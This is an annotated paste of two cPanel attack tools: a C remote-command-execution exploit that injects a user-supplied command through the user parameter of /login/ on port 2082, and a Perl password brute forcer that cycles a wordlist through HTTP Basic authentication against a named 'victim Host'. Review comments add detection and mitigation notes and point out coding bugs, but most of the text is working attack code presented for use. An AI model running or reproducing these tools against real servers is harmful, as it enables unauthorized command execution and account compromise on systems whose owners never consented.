wachiorsino

cPanel (HTTP) xploit

Dec 4th, 2014
  1. /*
  2. cPanel <= 9x Remote Command Execution
  3. //headers
  4. #include //In/Out
  5. #include //sockets functions
  6. #include //memory functions
  7. #include //strlen,strcat,strcpy
  8.  
  9. #pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib"
  10.  
  11. #define Port 2082 //port for connect to cPanel
  12. #define SIZE 1024 //buffer size to receive the data
  13.  
  14. /*connect host:port*/
  /*
   * Review note: Conecta opens a blocking TCP connection to Host:puerto with Winsock.
   * It calls WSAStartup (version 2.2), creates the socket with WSASocket, resolves
   * Host with gethostbyname and connects with WSAConnect.
   * Returns the connected SOCKET, or -1 after WSACleanup() when socket creation or
   * the connect fails.
   * Not checked in the code shown: the WSAStartup return value, and a NULL result
   * from gethostbyname. On a failed connect the socket handle itself is not closed
   * before WSACleanup().
   */
  15. SOCKET Conecta(char *Host, short puerto)
  16. {
  17. /*struct for make the socket*/
  18. WSADATA wsaData;
  19. SOCKET Winsock;//client socket used for the outbound connection
  20. /*two structures for connect*/
  21. struct sockaddr_in Winsock_In;
  22. struct hostent *Ip;
  23.  
  24. /*start the socket*/
  25. WSAStartup(MAKEWORD(2,2), &wsaData);
  26. /*make*/
  27. Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
  28.  
  29. //check socket status
  30. if(Winsock==INVALID_SOCKET)
  31. {
  32. /*exit*/
  33. WSACleanup();
  34. return -1;
  35. }
  36.  
  37. /*complete the struct*/
  38. Ip=gethostbyname(Host);
  39. Winsock_In.sin_port=htons(puerto);
  40. Winsock_In.sin_family=AF_INET;
  /* Ip is dereferenced here without a NULL check, so a Host that does not resolve reaches this line. */
  41. Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));
  42.  
  43. /*connect*/
  44. if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
  45. {
  46. /*end*/
  47. WSACleanup();
  48. return -1;
  49. }
  50.  
  51. return Winsock;
  52. }
  53.  
  54. /*MASTER FUNCTION*/
  /*
   * Review note (defensive reading): main() expects exactly two arguments, a host
   * and a string. It sends one GET for /login/ to TCP port 2082 (Port) with that
   * string placed inside the `user` query parameter, then prints the first reply.
   * The value is wrapped as |%22%60 ... %60%22, i.e. a pipe, a URL-encoded double
   * quote and a URL-encoded backtick on each side. The paste title attributes this
   * to a command-execution flaw in cPanel <= 9x; the server-side mechanism is not
   * shown on this page.
   *
   * Detection: the request line built here carries no HTTP version token and ends
   * in "\r\n\n". Access or proxy logs for port 2082 that show /login/ with `|`,
   * %22 or %60 (or their decoded forms) inside `user` match what this code emits.
   * Mitigation: run a cPanel release outside the range named in the title and
   * limit which sources can reach port 2082. The login handler should accept only
   * an allow-listed character set for user names.
   */
  55. int main(int argc, char *argv[])
  56. {
  57. /*the socket*/
  58. SOCKET sock;
  59. /*make the evil buffer to send the request*/
  60. char evil_request[]="GET /login/?user=|%22%60";
  61. char evil_request2[]="%60%22\r";
  62. char *evil;
  63. /*to receive the data*/
  64. char buf[SIZE];
  65.  
  66. printf("\n+[ cPanel <= 9x Remote Command Execution ]+ by Lympex");
  67. printf("\nContact: lympex[at]gmail[dot]com & http://l-bytes.net");
  68. printf("\n-----------------------------------------------------\n");
  69.  
  /* NOTE(review): the usage string below names no arguments; presumably the placeholders were lost when the paste was rendered. */
  70. if(argc!=3)//cPanel_9x_rce.exe
  71. {
  72. printf("\n[+] Usage: %s \n",argv[0]);
  73. return 0;
  74. }
  75.  
  76. printf("\n[+] Connecting %s:%d...",argv[1],Port);
  77.  
  78. /*start the exploit*/
  79. sock=Conecta(argv[1],Port);//connect
  80. if(sock==-1)
  81. {
  82. printf("Error\n");
  83. return 1;
  84. }
  85.  
  86. printf("OK");
  87.  
  88. /*make the EVIL request*/
  /* 24 is strlen(evil_request); the extra 12 covers evil_request2, the "\n\n" suffix and the terminator. The malloc result is not checked. */
  89. evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));
  90. strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,"\n\n");
  91.  
  92. //sends it
  93. send(sock,evil,strlen(evil),0);
  94.  
  /* The recv() result is used directly as an index: -1 on error writes before buf, and a full read of SIZE bytes writes one past its end. */
  95. buf[recv(sock,buf,SIZE,0)]='\0';
  96.  
  97. //show the data
  98. printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf);
  99.  
  100. WSACleanup();
  /* buf is a stack array and evil came from malloc(); neither is memory that LocalFree() owns. */
  101. LocalFree(buf);
  102. LocalFree(evil);
  103. return 0;
  104. }
  105.  
  106. #!/usr/bin/perl
  107. # Cpanel Password Brute Forcer
  108. # —————————-
  109. # (c)jos_ali_joe
  110. # Perl Version ( low speed )
  111. # Original Advisory :
  112. use IO :: Socket ;
  113. use LWP :: Simple ;
  114. use MIME :: Base64 ;
  115.  
  # Review note: the five positional arguments are copied into package globals;
  # no `use strict` or `use warnings` appears in the lines shown.
  116. $host = $ARGV [ 0 ];
  117. $user = $ARGV [ 1 ];
  118. $port = $ARGV [ 2 ];
  119. $list = $ARGV [ 3 ];
  120. $file = $ARGV [ 4 ];
  # $url and $file are assigned here but not referenced again in the visible code.
  121. $url = “http://” . $host . “:” . $port ;
  # The guard only requires three arguments, although headx() opens $list (the fourth).
  122. if(@ ARGV < 3 ){
  123. print q (
  124. ###############################################################
  125. # Cpanel Password Brute Force Tool #
  126. ###############################################################
  127. # usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
  128. #————————————————————-#
  129. # [Host] : victim Host (simorgh-ev.com) #
  130. # [User] : User Name (demo) #
  131. # [PORT] : Port of Cpanel (2082) #
  132. #[list] : File Of password list (list.txt) #
  133. # [File] : file for save password (password.txt) #
  134. # #
  135. ###############################################################
  136. # (c)jos_ali_joe / Indonesian Coder #
  137. ###############################################################
  138. );exit;}
  139.  
  # All of the work happens inside this call; headx() does not return until the list is exhausted or brut exits.
  140. headx ();
  141.  
  # $numstart is assigned but not referenced again in the visible code.
  142. $numstart = “-1″ ;
  143.  
  # headx: prints the banner, loads every line of the file named by $list into
  # @PASSWORDS, then for each entry sets the global $passwd, prints it and calls brut.
  # Review note: the list is opened with two-argument open and a bareword handle,
  # so the mode and the file name share one string taken from the command line.
  # Defensive reading: brut opens a new connection per call, so the target sees a
  # run of sequential authentication attempts for one user name from one source.
  # Per-account and per-source failure thresholds with lockout are the matching
  # control; cPanel ships cPHulk for this.
  144. sub headx () {
  145. print q (
  146. ###############################################################
  147. # Cpanel Password Brute Force Tool #
  148. # (c)jos_ali_joe / Indonesian Coder #
  149. ###############################################################
  150. );
  151. open ( PASSFILE , “<$list” ) || die “[-] Can’t open the List of password file !” ;
  # The whole list is read into memory before the first attempt is made.
  152. @ PASSWORDS = < PASSFILE >;
  153. close PASSFILE ;
  154. foreach my $P (@ PASSWORDS ) {
  155. chomp $P ;
  # The candidate is handed to brut through the global $passwd, not as an argument.
  156. $passwd = $P ;
  157. print ”
  158. [~] Try Password : $passwd
  159. ” ;
  160. & brut ;
  161. };
  162. }
  # brut: makes one HTTP Basic authentication attempt with the globals $user and
  # $passwd against $host:$port, and exits the script when the first 128 bytes of
  # the reply match the pattern / Moved / (spacing as rendered in this paste).
  # Defensive reading: the request written below is "GET / HTTP/1.1" with only
  # Authorization and Connection headers. No Host or User-Agent header is sent,
  # which makes these attempts easy to single out in server or proxy logs.
  # The credential pair is only Base64-encoded, so on a plain-HTTP port such as the
  # 2082 named in the usage banner it crosses the network readable. The script
  # also echoes the encoded value to standard output.
  163. sub brut () {
  164. $authx = encode_base64 ( $user . “:” . $passwd );
  165. print $authx ;
  # Review note: if the connect fails, `|| print` leaves the return value of print in $sock and the writes that follow are not guarded.
  166. my $sock = IO :: Socket :: INET -> new ( Proto => “tcp” , PeerAddr => “$host” , PeerPort => “$port” ) || print ”
  167. [-] Can not connect to the host” ;
  168. print $sock “GET / HTTP/1.1
  169. ” ;
  170. print $sock “Authorization: Basic $authx
  171. ” ;
  172. print $sock “Connection: Close
  173.  
  174. ” ;
  # Only the first 128 bytes of the response are inspected.
  175. read $sock , $answer , 128 ;
  176. close ( $sock );
  177.  
  # NOTE(review): success is inferred from the word "Moved" in the reply, presumably a redirect status line; confirm against the server's actual response.
  178. if ( $answer =~ / Moved /) {
  179. print ”
  180. [~] PASSWORD FOUND : $passwd
  181. ” ;
  182. exit();
  183. }
  184. }